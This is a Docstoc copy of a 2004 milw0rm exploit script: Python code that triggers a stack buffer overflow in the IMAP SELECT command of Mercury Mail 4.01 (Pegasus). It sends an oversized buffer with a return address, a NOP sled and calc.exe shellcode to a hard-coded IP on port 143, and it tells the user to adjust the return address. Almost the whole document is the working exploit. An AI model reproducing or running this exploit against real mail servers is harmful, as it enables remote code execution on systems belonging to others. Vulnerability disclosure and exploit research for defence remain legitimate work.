Docstoc

Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit

Document Sample
Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit Powered By Docstoc
					                                Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Exploit   Page 1/1
  1




  2    #########################################################
  3    #                                                       #
  4    # Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow      #
  5    # Discovered by : Muts                                  #
  6    # Coded by : Muts                                       #
  7    # WWW.WHITEHAT.CO.IL                                    #
  8    # Plain vanilla stack overflow in the SELECT command    #
  9    #                                                       #
  10   #########################################################
  11
  12
  13   import struct
  14   import socket
  15   from time import sleep
  16
  17   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  18
  19   # Lame calc.exe shellcode − dont expect miracles!
  20
  21   sc2   = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
  22   sc2   += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
  23   sc2   += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
  24   sc2   += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
  25   sc2   += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
  26   sc2   += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
  27   sc2   += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
  28   sc2   += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
  29   sc2   += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
  30   sc2   += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
  31   sc2   += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
  32   sc2   += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"
  33
  34   #Change RET Address as needed
  35   buffer = ’\x41’*260 + struct.pack(’<L’, 0x782f28f7)+ ’\x90’*32+sc2
  36
  37   print "\nSending evil buffer..."
  38   s.connect((’192.168.1.167’,143))
  39   s.send(’a001 LOGIN ftp ftp’ + ’\r\n’)
  40   data = s.recv(1024)
  41   sleep(3)
  42   s.send(’A001 SELECT ’ + buffer+’\r\n’)
  43   data = s.recv(1024)
  44   s.close()
  45   print "\nDone! "
  46
  47   # milw0rm.com [2004−11−29]



muts                                                                                     11/29/2004

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:29
posted:5/23/2010
language:English
pages:1